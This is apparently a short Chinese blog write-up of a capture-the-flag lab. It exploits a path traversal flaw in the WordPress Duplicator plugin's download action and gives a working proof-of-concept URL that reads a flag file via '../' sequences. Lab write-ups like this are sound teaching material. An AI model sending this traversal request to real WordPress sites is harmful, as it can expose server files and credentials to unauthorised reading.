1.阅读靶场介绍
我们可以得到的信息是
下载功能没有对路径进行过滤,造成任意文件读取
简单来说就是对url做文章
2.启动靶场
我们会得到如下页面
3.poc
我们直接访问这个url
eci-2zeflo1zmo7b1535tsrc.cloudeci1.ichunqiu.com:80/wp-admin/admin-ajax.php?action=duplicator_download&file=../../../../../../../../flag
结果是我们下载了flag这个文件
用记事本打开,这个就是我们心心念念的flag了
到此又要恭喜各位攻克一个靶场了
期待博主攻克任何靶场的请留言
期待你的支持,最后感谢你们宝贵的时间